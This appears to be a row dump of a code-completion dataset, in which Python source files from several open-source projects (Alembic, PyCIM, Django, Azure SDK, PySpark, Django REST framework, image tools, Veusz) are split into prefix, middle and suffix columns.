repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
Clinical-Genomics/housekeeper | alembic/versions/619fe6fe066c_update_cascading_rules.py | Python | mit | 554 | 0.01083 | """update cascading rules
Revision ID: 619fe6fe066c
Revises: 73ea6c072986
Create Date: 2017-03-15 10:51:12.494508
"""
# revision identifiers, used by Alembic.
revision = "619fe6fe066 | c"
down_revision = "73ea | 6c072986"
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Apply this revision's schema changes.

    Auto-generated stub: the cascading-rule change carries no schema
    operations here, so this migration is a no-op placeholder.
    """
    ### commands auto generated by Alembic - please adjust! ###
    pass
    ### end Alembic commands ###
def downgrade():
    """Revert this revision's schema changes.

    Auto-generated stub: nothing to undo because upgrade() performs no
    schema operations.
    """
    ### commands auto generated by Alembic - please adjust! ###
    pass
    ### end Alembic commands ###
|
rwl/PyCIM | CIM14/IEC61970/Meas/LimitSet.py | Python | mit | 2,248 | 0.002669 | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, | free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# de | al in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.IEC61970.Core.IdentifiedObject import IdentifiedObject
class LimitSet(IdentifiedObject):
    """Specifies a set of Limits that are associated with a Measurement. A Measurement may have several LimitSets corresponding to seasonal or other changing conditions. The condition is captured in the name and description attributes. The same LimitSet may be used for several Measurements. In particular percentage limits are used this way.
    """

    def __init__(self, isPercentageLimits=False, *args, **kw_args):
        """Initialises a new 'LimitSet' instance.

        @param isPercentageLimits: Tells if the limit values are in percentage of normalValue or the specified Unit for Measurements and Controls.
        """
        #: Tells if the limit values are in percentage of normalValue or the specified Unit for Measurements and Controls.
        self.isPercentageLimits = isPercentageLimits

        super(LimitSet, self).__init__(*args, **kw_args)

    # Class-level introspection tables — presumably consumed by PyCIM's
    # generic (de)serialisation code; verify against the package docs.
    _attrs = ["isPercentageLimits"]
    _attr_types = {"isPercentageLimits": bool}
    _defaults = {"isPercentageLimits": False}
    _enums = {}
    _refs = []
    _many_refs = []
|
umitproject/network-admin | netadmin/reportmeta/urls.py | Python | agpl-3.0 | 1,723 | 0.004643 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 Adriano Monteiro Marques
#
# Author: Piotrek Wasilewski <wasilewski.piotrek@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls.defaults import *
from django.views.generic.create_update import delete_object
from netadmin.reportmeta.models import ReportMeta
urlpatterns = patterns('netadmin.reportmeta.views',
url(r'^$', 'reports', name='reports'),
url(r'^(?P<object_id>\d+)/$', 'reportmeta_detail', name='reportmeta_detail'),
url(r'^get/(?P<object_id>\d+)/$', 'reportmeta_get_report', name='reportmeta_g | et_report'),
url(r'^list/(?P<object_type>host|network)/$', 'reportmeta_list', name='reportmeta_list'),
url(r'^new/(?P<object_type>host|network)/$', 'reportmeta_new', name="reportmeta_new"),
url(r'^new/(?P<object_type>host|network)/(?P<object_id>\d+)/$', 'reportmeta_new_from_object', name="reportmeta_new"),
url(r'^edit/(?P<object_id>\d+)/$', 'reportmeta_update', na | me="reportmeta_update"),
url(r'^delete/(?P<object_id>\d+)/$', 'reportmeta_delete', name="reportmeta_delete"),
)
|
Azure/azure-sdk-for-python | sdk/azurestack/azure-mgmt-azurestack/azure/mgmt/azurestack/models/__init__.py | Python | mit | 5,480 | 0.000547 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import ActivationKeyResult
from ._models_py3 import CloudManifestFileDeploymentData
from ._models_py3 import CloudManifestFileProperties
from ._models_py3 import CloudManifestFileResponse
from ._models_py3 import Compatibility
from ._models_py3 import CustomerSubscription
from ._models_py3 import CustomerSubscriptionList
from ._models_py3 import DataDiskImage
from ._models_py3 import DeviceConfiguration
from ._models_py3 import Display
from ._models_py3 import ErrorDetails
from ._models_py3 import ErrorResponse
from ._models_py3 import ExtendedProduct
from ._models_py3 import ExtendedProductProperties
from ._models_py3 import IconUris
from ._models_py3 import LinkedSubscription
from ._models_py3 import LinkedSubscriptionParameter
from ._models_py3 import LinkedSubscriptionsList
from ._models_py3 import MarketplaceProductLogUpdate
from ._models_py3 import Operation
from ._models_py3 import OperationList
fr | om ._models_py3 import OsDiskImage
from ._models_py3 import Product
from ._models_py3 import ProductLink
from ._models_py3 import ProductList
from ._models_py3 import ProductLog
from ._models_py3 import ProductProperties
from ._models_py3 import Registration
from ._models_py3 import RegistrationList
from ._models_py3 import RegistrationParameter
from ._models_py3 import Resource
from ._models_py3 import SystemData
from ._models_py3 import T | rackedResource
from ._models_py3 import VirtualMachineExtensionProductProperties
from ._models_py3 import VirtualMachineProductProperties
except (SyntaxError, ImportError):
from ._models import ActivationKeyResult # type: ignore
from ._models import CloudManifestFileDeploymentData # type: ignore
from ._models import CloudManifestFileProperties # type: ignore
from ._models import CloudManifestFileResponse # type: ignore
from ._models import Compatibility # type: ignore
from ._models import CustomerSubscription # type: ignore
from ._models import CustomerSubscriptionList # type: ignore
from ._models import DataDiskImage # type: ignore
from ._models import DeviceConfiguration # type: ignore
from ._models import Display # type: ignore
from ._models import ErrorDetails # type: ignore
from ._models import ErrorResponse # type: ignore
from ._models import ExtendedProduct # type: ignore
from ._models import ExtendedProductProperties # type: ignore
from ._models import IconUris # type: ignore
from ._models import LinkedSubscription # type: ignore
from ._models import LinkedSubscriptionParameter # type: ignore
from ._models import LinkedSubscriptionsList # type: ignore
from ._models import MarketplaceProductLogUpdate # type: ignore
from ._models import Operation # type: ignore
from ._models import OperationList # type: ignore
from ._models import OsDiskImage # type: ignore
from ._models import Product # type: ignore
from ._models import ProductLink # type: ignore
from ._models import ProductList # type: ignore
from ._models import ProductLog # type: ignore
from ._models import ProductProperties # type: ignore
from ._models import Registration # type: ignore
from ._models import RegistrationList # type: ignore
from ._models import RegistrationParameter # type: ignore
from ._models import Resource # type: ignore
from ._models import SystemData # type: ignore
from ._models import TrackedResource # type: ignore
from ._models import VirtualMachineExtensionProductProperties # type: ignore
from ._models import VirtualMachineProductProperties # type: ignore
from ._azure_stack_management_client_enums import (
Category,
CompatibilityIssue,
ComputeRole,
CreatedByType,
Location,
OperatingSystem,
ProvisioningState,
)
__all__ = [
'ActivationKeyResult',
'CloudManifestFileDeploymentData',
'CloudManifestFileProperties',
'CloudManifestFileResponse',
'Compatibility',
'CustomerSubscription',
'CustomerSubscriptionList',
'DataDiskImage',
'DeviceConfiguration',
'Display',
'ErrorDetails',
'ErrorResponse',
'ExtendedProduct',
'ExtendedProductProperties',
'IconUris',
'LinkedSubscription',
'LinkedSubscriptionParameter',
'LinkedSubscriptionsList',
'MarketplaceProductLogUpdate',
'Operation',
'OperationList',
'OsDiskImage',
'Product',
'ProductLink',
'ProductList',
'ProductLog',
'ProductProperties',
'Registration',
'RegistrationList',
'RegistrationParameter',
'Resource',
'SystemData',
'TrackedResource',
'VirtualMachineExtensionProductProperties',
'VirtualMachineProductProperties',
'Category',
'CompatibilityIssue',
'ComputeRole',
'CreatedByType',
'Location',
'OperatingSystem',
'ProvisioningState',
]
|
sangwook236/general-development-and-testing | sw_dev/python/ext/test/high_performance_computing/spark/pyspark_database.py | Python | gpl-2.0 | 5,564 | 0.028936 | #!/usr/bin/env python
from pyspark.sql import SparkSession
import pyspark.sql.types as types
import pyspark.sql.functions as func
import traceback, sys
# REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#jdbc-to-other-databases
def sqlite_jdbc():
spark = SparkSession.builder.appName('sqlite-jdbc') \
.config('spark.jars.packages', 'org.xerial:sqlite-jdbc:3.23.1') \
.getOrCreate()
#spark = SparkSession.buil | der.appName('sqlite-jdbc') \
# .config('spark.jars', 'sqlite-jdbc-3.23.1.jar') \
# .getOrCreate()
spark.sparkContext.setLogLevel('WARN')
# REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#pyspark-usage-guide-for-pandas-with-apache-arrow
# Enable Arrow-based columnar data transfers.
spark.conf.set('spark.sql.execution.arrow.enabled', 'true')
if False:
#db_url = 'jdbc:sqlite:/path/to/dbfile' # File DB.
df = spark.read \
.format('jdbc') \
.option( | 'url', 'jdbc:sqlite:iris.db') \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'iris') \
.load()
elif False:
# REF [site] >> https://www.sqlite.org/inmemorydb.html
#db_url = 'jdbc:sqlite::memory:' # In-memory DB.
db_url = 'jdbc:sqlite::memory:?cache=shared' # Shared in-memory DB.
#db_url = 'jdbc:sqlite:dbname?mode=memory&cache=shared' # Named, shared in-memory DB.
# NOTE [error] >> Requirement failed: Option 'dbtable' is required.
# NOTE [error] >> SQL error or missing database (no such table: test123).
df = spark.read \
.format('jdbc') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'test123') \
.load()
else:
rdd = spark.sparkContext.parallelize([
(123, 'Katie', 19, 'brown'),
(234, 'Michael', 22, 'green'),
(345, 'Simone', 23, 'blue')
])
# Specify schema.
schema = types.StructType([
types.StructField('id', types.LongType(), True),
types.StructField('name', types.StringType(), True),
types.StructField('age', types.LongType(), True),
types.StructField('eyeColor', types.StringType(), True)
])
df = spark.createDataFrame(rdd, schema)
df.show()
# NOTE [info] >> It seems that only file DB of SQLite can be used in Spark.
db_url = 'jdbc:sqlite:test.sqlite' # File DB.
# Isolation level: NONE, READ_COMMITTED, READ_UNCOMMITTED, REPEATABLE_READ, SERIALIZABLE.
# REF [site] >> https://stackoverflow.com/questions/16162357/transaction-isolation-levels-relation-with-locks-on-table
df.write \
.format('jdbc') \
.mode('overwrite') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'swimmers') \
.option('isolationLevel', 'NONE') \
.save()
#df.write.jdbc(url=db_url, table='test', mode='overwrite', properties={'driver': 'org.sqlite.JDBC'})
df1 = df.withColumn('gender', func.lit(0))
df2 = spark.createDataFrame(
[(13, 'Lucy', 12, 'brown'), (37, 'Brian', 47, 'black')],
('id', 'name', 'age', 'eyeColor')
)
df2.write \
.format('jdbc') \
.mode('append') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'swimmers') \
.option('isolationLevel', 'NONE') \
.save()
def mysql_jdbc():
    """Read a MySQL table into a Spark DataFrame over JDBC and show it.

    The connection values (host, dbname, tablename, username, password)
    are placeholders and must be replaced before running.
    """
    # Pull the MySQL JDBC driver from Maven at session start-up.
    spark = SparkSession.builder.appName('mysql-jdbc') \
        .config('spark.jars.packages', 'mysql:mysql-connector-java:8.0.12') \
        .getOrCreate()
    # Alternative: point at a locally-downloaded driver jar instead.
    #spark = SparkSession.builder.appName('mysql-jdbc') \
    #	.config('spark.jars', 'mysql-connector-java-8.0.12-bin.jar') \
    #	.getOrCreate()
    spark.sparkContext.setLogLevel('WARN')

    # REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#pyspark-usage-guide-for-pandas-with-apache-arrow
    # Enable Arrow-based columnar data transfers.
    spark.conf.set('spark.sql.execution.arrow.enabled', 'true')

    df = spark.read \
        .format('jdbc') \
        .option('url', 'jdbc:mysql://host:3306/dbname?characterEncoding=UTF-8&serverTimezone=UTC') \
        .option('driver', 'com.mysql.cj.jdbc.Driver') \
        .option('dbtable', 'tablename') \
        .option('user', 'username') \
        .option('password', 'password') \
        .load()
    df.show()
def sql_basic():
    """Demonstrate SQL queries over a DataFrame via a temporary view."""
    spark = SparkSession.builder.appName('dataframe-operation').getOrCreate()
    spark.sparkContext.setLogLevel('WARN')

    df = spark.createDataFrame(
        [(123, 'Katie', 19, 'brown'), (234, 'Michael', 22, 'green'), (345, 'Simone', 23, 'blue')],
        ('id', 'name', 'age', 'eyeColor')
    )
    #df.printSchema()
    #df.cache()

    df.createOrReplaceTempView('swimmers')  # DataFrame -> SQL.
    #df1 = spark.sql('select * from swimmers')  # SQL -> DataFrame.
    spark.sql('select * from swimmers where age >= 20').show()
    #spark.catalog.dropTempView('swimmers')
def main():
    """Entry point: run the selected demo (JDBC demos left disabled)."""
    #sqlite_jdbc()
    #mysql_jdbc()
    sql_basic()
#%%------------------------------------------------------------------
# Usage:
# python pyspark_database.py
# spark-submit --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 pyspark_database.py
# spark-submit --master local[4] --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 pyspark_database.py
# spark-submit --master spark://host:7077 --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 --executor-memory 10g pyspark_database.py
if '__main__' == __name__:
    try:
        main()
    except:  # deliberate top-level catch-all: report any failure with a traceback
        #ex = sys.exc_info()  # (type, exception object, traceback).
        ##print('{} raised: {}.'.format(ex[0], ex[1]))
        #print('{} raised: {}.'.format(ex[0].__name__, ex[1]))
        #traceback.print_tb(ex[2], limit=None, file=sys.stdout)
        #traceback.print_exception(*sys.exc_info(), limit=None, file=sys.stdout)
        traceback.print_exc(limit=None, file=sys.stdout)
|
interlegis/saap | config/rest_framework/templatetags/rest_framework.py | Python | gpl-3.0 | 13,251 | 0.001207 | from __future__ import absolute_import, unicode_literals
import re
from collections import OrderedDict

from django import template
from django.template import loader
#from django.urls import NoReverseMatch, reverse
from django.core.urlresolvers import NoReverseMatch, reverse
from django.utils import six
from django.utils.encoding import force_text, iri_to_uri
from django.utils.html import escape, format_html, smart_urlquote
from django.utils.safestring import SafeData, mark_safe

from rest_framework.compat import apply_markdown, pygments_highlight
from rest_framework.renderers import HTMLFormRenderer
from rest_framework.utils.urls import replace_query_param
register = template.Library()
# Regex for adding classes to html snippets
class_re = re.compile(r'(?<=class=["\'])(.*)(?=["\'])')
@register.tag(name='code')
def highlight_code(parser, token):
    """Template tag ``{% code <lang> %}...{% endcode %}``.

    Captures the enclosed node list and returns a CodeNode that renders
    it with pygments syntax highlighting for the given language.
    """
    code = token.split_contents()[-1]  # last token is the language name
    nodelist = parser.parse(('endcode',))
    parser.delete_first_token()
    return CodeNode(code, nodelist)
class CodeNode(template.Node):
    """Template node that renders its contents through pygments."""
    style = 'emacs'  # pygments style name used for highlighting

    def __init__(self, lang, code):
        self.lang = lang
        self.nodelist = code

    def render(self, context):
        """Render the captured nodes, then syntax-highlight the result."""
        text = self.nodelist.render(context)
        return pygments_highlight(text, self.lang, self.style)
@register.filter()
def with_location(fields, location):
    """Filter *fields* down to the ones whose ``location`` attribute
    equals *location*, preserving their original order."""
    matching = []
    for field in fields:
        if field.location == location:
            matching.append(field)
    return matching
@register.simple_tag
def form_for_link(link):
    """Render an HTML form for a coreapi link from its field schemas.

    Fields without an explicit schema default to a string input;
    required fields are passed through to the generated form.
    """
    import coreschema
    properties = OrderedDict([
        (field.name, field.schema or coreschema.String())
        for field in link.fields
    ])
    required = [
        field.name
        for field in link.fields
        if field.required
    ]
    schema = coreschema.Object(properties=properties, required=required)
    return mark_safe(coreschema.render_to_form(schema))
@register.simple_tag
def render_markdown(markdown_text):
    """Render *markdown_text* to HTML, or return it unchanged when the
    markdown library is unavailable (apply_markdown is None)."""
    if apply_markdown is None:
        return markdown_text
    return mark_safe(apply_markdown(markdown_text))
@register.simple_tag
def get_pagination_html(pager):
    """Return the pagination control HTML produced by the pager."""
    return pager.to_html()
@register.simple_tag
def render_form(serializer, template_pack=None):
    """Render a serializer's data as an HTML form, optionally using a
    specific template pack (e.g. a horizontal/vertical layout)."""
    style = {'template_pack': template_pack} if template_pack else {}
    renderer = HTMLFormRenderer()
    return renderer.render(serializer.data, None, {'style': style})
@register.simple_tag
def render_field(field, style):
    """Render one form field with the renderer taken from *style*,
    falling back to a fresh HTMLFormRenderer."""
    renderer = style.get('renderer', HTMLFormRenderer())
    return renderer.render_field(field, style)
@register.simple_tag
def optional_login(request):
    """
    Include a login snippet if REST framework's login view is in the URLconf.

    Returns an empty string when the 'rest_framework:login' route is not
    registered; otherwise a list-item link carrying a ?next= redirect
    back to the current page.
    """
    try:
        login_url = reverse('rest_framework:login')
    except NoReverseMatch:
        # Login view not installed; omit the snippet entirely.
        return ''

    snippet = "<li><a href='{href}?next={next}'>Log in</a></li>"
    snippet = format_html(snippet, href=login_url, next=escape(request.path))

    return mark_safe(snippet)
@register.simple_tag
def optional_docs_login(request):
    """
    Include a login snippet if REST framework's login view is in the URLconf.

    Unlike optional_login, this always yields text: plain 'log in' when
    the route is missing, otherwise an anchor with a ?next= redirect.
    """
    try:
        login_url = reverse('rest_framework:login')
    except NoReverseMatch:
        return 'log in'

    snippet = "<a href='{href}?next={next}'>log in</a>"
    snippet = format_html(snippet, href=login_url, next=escape(request.path))

    return mark_safe(snippet)
@register.simple_tag
def optional_logout(request, user):
    """
    Include a logout snippet if REST framework's logout view is in the URLconf.

    Falls back to a plain username label when no logout route exists;
    otherwise renders a Bootstrap dropdown containing a log-out link.
    """
    try:
        logout_url = reverse('rest_framework:logout')
    except NoReverseMatch:
        # No logout view registered: just show who is logged in.
        snippet = format_html('<li class="navbar-text">{user}</li>', user=escape(user))
        return mark_safe(snippet)

    snippet = """<li class="dropdown">
        <a href="#" class="dropdown-toggle" data-toggle="dropdown">
            {user}
            <b class="caret"></b>
        </a>
        <ul class="dropdown-menu">
            <li><a href='{href}?next={next}'>Log out</a></li>
        </ul>
    </li>"""
    snippet = format_html(snippet, user=escape(user), href=logout_url, next=escape(request.path))

    return mark_safe(snippet)
@register.simple_tag
def add_query_param(request, key, val):
    """
    Add a query parameter to the current request url, and return the new url.
    """
    iri = request.get_full_path()
    uri = iri_to_uri(iri)  # IRI -> ASCII-safe URI before substituting the param
    return escape(replace_query_param(uri, key, val))
@register.filter
def as_string(value):
    """Coerce *value* to a string, mapping None to the empty string."""
    return '' if value is None else '%s' % value
@register.filter
def as_list_of_strings(value):
    """Stringify every item of *value*, mapping None items to ''."""
    result = []
    for item in value:
        result.append('' if item is None else '%s' % item)
    return result
@register.filter
def add_class(value, css_class):
    """
    https://stackoverflow.com/questions/4124220/django-adding-css-classes-when-rendering-form-fields-in-a-template

    Inserts classes into template variables that contain HTML tags,
    useful for modifying forms without needing to change the Form objects.

    Usage:

        {{ field.label_tag|add_class:"control-label" }}

    In the case of REST Framework, the filter is used to add Bootstrap-specific
    classes to the forms.
    """
    html = six.text_type(value)
    match = class_re.search(html)
    if match:
        # The tag already has a class attribute: only append css_class if
        # it is not already present as a whole word within that attribute.
        m = re.search(r'^%s$|^%s\s|\s%s\s|\s%s$' % (css_class, css_class,
                                                    css_class, css_class),
                      match.group(1))
        if not m:
            return mark_safe(class_re.sub(match.group(1) + " " + css_class,
                                          html))
    else:
        # No class attribute at all: inject one into the first opening tag.
        return mark_safe(html.replace('>', ' class="%s">' % css_class, 1))
    # Class already present; return the value unchanged.
    return value
@register.filter
def format_value(value):
if getattr(value, 'is_hyperlink', False):
name = six.text_type(value.obj)
return mark_safe('<a href=%s>%s</a>' % (value, escape(name)))
if value is None or isinstance(value, bool):
return mar | k_safe('<code>%s</code>' % {True: 'true', False: 'false', None: 'null'}[value])
elif isinstance(value, list):
if any([isinstance(item, (list, dict)) for item in value]):
template = loader.get_template('rest_framework/admin/list_value.html')
else:
template = loader.get_template('rest_framework/admin/simple_list_value.html')
context = {'value': value}
return template.render(context)
elif isinstance(value, dict) | :
template = loader.get_template('rest_framework/admin/dict_value.html')
context = {'value': value}
return template.render(context)
elif isinstance(value, six.string_types):
if (
(value.startswith('http:') or value.startswith('https:')) and not
re.search(r'\s', value)
):
return mark_safe('<a href="{value}">{value}</a>'.format(value=escape(value)))
elif '@' in value and not re.search(r'\s', value):
return mark_safe('<a href="mailto:{value}">{value}</a>'.format(value=escape(value)))
elif '\n' in value:
return mark_safe('<pre>%s</pre>' % escape(value))
return six.text_type(value)
@register.filter
def items(value):
    """Return ``value.items()`` explicitly.

    Django template dot-notation resolves the key ``'items'`` before the
    method of the same name, so dicts that contain an ``'items'`` key
    need this filter (see issue #4931). Also see:
    https://stackoverflow.com/questions/15416662/django-template-loop-over-dictionary-items-with-items-as-key
    """
    pairs = value.items()
    return pairs
@register.filter
def data(value):
    """Return the object's ``data`` attribute explicitly.

    As with the ``items`` filter, this allows accessing ``document.data``
    when a coreapi Document contains a Link keyed at "data" that would
    otherwise shadow the attribute in template lookup (see issue #5395).
    """
    return getattr(value, 'data')
@register.filter
def schema_links(section, sec_key=None):
"""
Recursively find every link in a schema, even nested.
"""
NESTED_FORMAT = '%s > %s' # this format is used in docs/js/api.js:normalizeKeys
links = section.links
if section.data:
data = section.data.items()
for sub_section_key, sub_section in d |
timvaillancourt/mongodb_consistent_backup | mongodb_consistent_backup/Upload/__init__.py | Python | apache-2.0 | 1,026 | 0.008772 | from Upload import Upload # NOQA
def config(parser):
parser.add_argument("--upload.method", dest="upload.method", default='none', choices=['gs', 'rsync', 's3', 'none'],
help="Uploader method (default: none)")
parser.add_argument("--upload.remove_uploaded", dest="upload.remove_uploaded", default=False, action="store_true",
help="Remove source files after successful upload ( | default: false)")
parser.add_argument("--upload.retries", dest="upload.retries", default=5, type=int,
help="Number of times to retry upload attempts (default: 5)")
parser.add_argument("--upload.threads", dest="upload.threads", default=4, type=int,
help="Number of threads to use for upload (default: 4)")
parser.add_argument("--upload.file_regex", dest="upload.file_regex", default='none', type=str,
| help="Limit uploaded file names to those matching a regular expression. (default: none)")
return parser
|
BogusCurry/picup-it | picupwebapp/picupwebapp/picture/tools.py | Python | bsd-3-clause | 3,826 | 0.007318 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Image processing tools.
"""
from unidecode import unidecode
from django.conf import settings
import StringIO
try:
from PIL import Image, ImageOps, ImageFilter
except ImportError:
import Image
import ImageOps
import os.path
import shutil
from PIL import Image
from PIL.ExifTags import TAGS
import pyexiv2
THUMB_SIZE = settings.PICUP_THUMB_SIZE
MEDIUM_SIZE = settings.PICUP_MEDIUM_SIZE
def rotate_picture(picture):
    """Rotate ``picture`` upright according to its EXIF Orientation tag.

    When the orientation is anything other than 1 (already upright), the
    original file is preserved once with an ``.orig`` suffix, the pixels
    are rotated, the original EXIF block is copied onto the rotated file
    with Orientation reset to 1, and the thumbnail is regenerated.

    Parameters
    ----------
    picture : Picture
        Model instance whose ``picture`` field points at the image file.
    """
    tags = {}
    i = Image.open(picture.picture.file)
    try:
        # _getexif() may return None or raise for formats without EXIF.
        info = i._getexif()
        for tag, value in info.items():
            decoded = TAGS.get(tag, tag)
            tags[decoded] = value
        orientation = tags['Orientation']
    except Exception:
        # Was a bare `except:` (also swallowed KeyboardInterrupt /
        # SystemExit). No usable EXIF data: assume the image is upright.
        orientation = 1

    if not orientation == 1:
        orig_filename = picture.picture.file.name + '.orig'
        # Keep an untouched copy of the original upload (only once).
        if not os.path.exists(orig_filename):
            shutil.copyfile(picture.picture.file.name, orig_filename)
        exif_orig = pyexiv2.ImageMetadata(picture.picture.file.name)
        exif_orig.read()
        i = Image.open(orig_filename)
        if orientation == 3:
            i = i.transpose(Image.ROTATE_180)
        elif orientation == 6:
            i = i.transpose(Image.ROTATE_270)
        elif orientation == 8:
            i = i.transpose(Image.ROTATE_90)
        i.save(picture.picture.file.name)
        # Copy the original EXIF onto the rotated file, then mark it as
        # upright so viewers do not rotate it a second time.
        exif_new = pyexiv2.ImageMetadata(picture.picture.file.name)
        exif_new.read()
        exif_orig.copy(exif_new)
        exif_new['Exif.Image.Orientation'] = 1
        exif_new.write()
        picture.update_thumb()
def process_image(image, size_x, size_y):
"""Process an image.
Parameters
----------
image: models.ImageField
size_x : int
width of the image
size_y : int
height of the image
"""
image.seek(0)
imagefile = StringIO.StringIO(image.read())
imageImage = Image.open(imagefile)
if imageImage.mode != "RGB":
imageImage = imageImage.convert("RGB")
size = imageImage.size
resizedImage = ImageOps.fit(imageImage, (size_x, size_y), Image.ANTIALIAS)
if size[0] < size_x or size[1] < size_y:
if size[0] < size_x:
posX = (size_x-size[0])/2
else:
posX = 0
if size[1] < size_y:
posY = (size_y-size[1])/2
else:
| posY = 0
| resizedImage = resizedImage.filter(ImageFilter.SMOOTH)
resizedImage = resizedImage.filter(ImageFilter.SMOOTH_MORE)
resizedImage = resizedImage.filter(ImageFilter.BLUR)
imagefile = StringIO.StringIO()
resizedImage.save(imagefile,'JPEG')
imagefile.seek(0)
return imagefile
def image_smart(image, x, y):
    """Resize *image* to exactly (x, y) pixels via process_image.

    Parameters
    ----------
    image : models.ImageField
    x : int
        width of the image
    y : int
        height of the image

    Returns an in-memory JPEG buffer (StringIO), as produced by
    process_image.
    """
    return process_image(image, x, y)
def image_medium(image):
    """Process an image with MEDIUM_SIZE as size.

    MEDIUM_SIZE comes from settings.PICUP_MEDIUM_SIZE as a
    (width, height) pair.

    Parameters
    ----------
    image : models.ImageField
    """
    return process_image(image, MEDIUM_SIZE[0], MEDIUM_SIZE[1])
def image_thumb(image):
    """Process an image with THUMB_SIZE as size.

    THUMB_SIZE comes from settings.PICUP_THUMB_SIZE as a
    (width, height) pair.

    Parameters
    ----------
    image : models.ImageField
    """
    return process_image(image, THUMB_SIZE[0], THUMB_SIZE[1])
def get_metadata(filename):
    """Read and return the image metadata for the file at *filename*.

    Parameters
    ----------
    filename : str

    Returns
    -------
    pyexiv2.ImageMetadata
        Metadata object with read() already performed, ready for key access.
    """
    metadata = pyexiv2.ImageMetadata(filename)
    metadata.read()
    return metadata
|
bks/veusz | veusz/windows/mainwindow.py | Python | gpl-2.0 | 53,469 | 0.001234 | # -*- coding: utf-8 -*-
# Copyright (C) 2003 Jeremy S. Sanders
# Email: Jeremy Sanders <jeremy@jeremysanders.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##############################################################################
"""Implements the main window of the application."""
from __future__ import division, print_function
import os
import os.path
import sys
import glob
import re
import datetime
try:
import h5py
except ImportError:
h5py = None
from ..compat import cstr, cstrerror, cgetcwd, cbytes
from .. import qtall as qt4
from .. import document
from .. import utils
from ..utils import vzdbus
from .. import setting
from .. import plugins
from . import consolewindow
from . import plotwindow
from . import treeeditwindow
from .datanavigator import DataNavigatorWindow
def _(text, disambiguation=None, context='MainWindow'):
    """Translate text via Qt's translation system, defaulting to the
    'MainWindow' translation context."""
    return qt4.QCoreApplication.translate(context, text, disambiguation)
# shortcut to this
setdb = setting.settingdb
class DBusWinInterface(vzdbus.Object):
    """Simple DBus interface to window for triggering actions."""

    interface = 'org.veusz.actions'

    def __init__(self, actions, index):
        """Register this object on the DBus session bus.

        actions: mapping of action name -> action object with a
            trigger() method (Qt actions).
        index: window index used to build the DBus object path.
        """
        prefix = '/Windows/%i/Actions' % index
        # possible exception in dbus means we have to check sessionbus
        if vzdbus.sessionbus is not None:
            vzdbus.Object.__init__(self, vzdbus.sessionbus, prefix)
        self.actions = actions

    @vzdbus.method(dbus_interface=interface, out_signature='as')
    def GetActions(self):
        """Get list of actions which can be activated."""
        return sorted(self.actions)

    @vzdbus.method(dbus_interface=interface, in_signature='s')
    def TriggerAction(self, action):
        """Activate action given."""
        self.actions[action].trigger()
class MainWindow(qt4.QMainWindow):
""" The main window class for the application."""
# this is emitted when a dialog is opened by the main window
dialogShown = qt4.pyqtSignal(qt4.QWidget)
# emitted when a document is opened
documentOpened = qt4.pyqtSignal()
windows = []
@classmethod
def CreateWindow(cls, filename=None, mode='graph'):
"""Window factory function.
If filename is given then that file is loaded into the window.
Returns window created
"""
# create the window, and optionally load a saved file
win = cls()
win.show()
if filename:
# load document
win.openFileInWindow(filename)
else:
win.setupDefaultDoc(mode)
# try to select first graph of first page
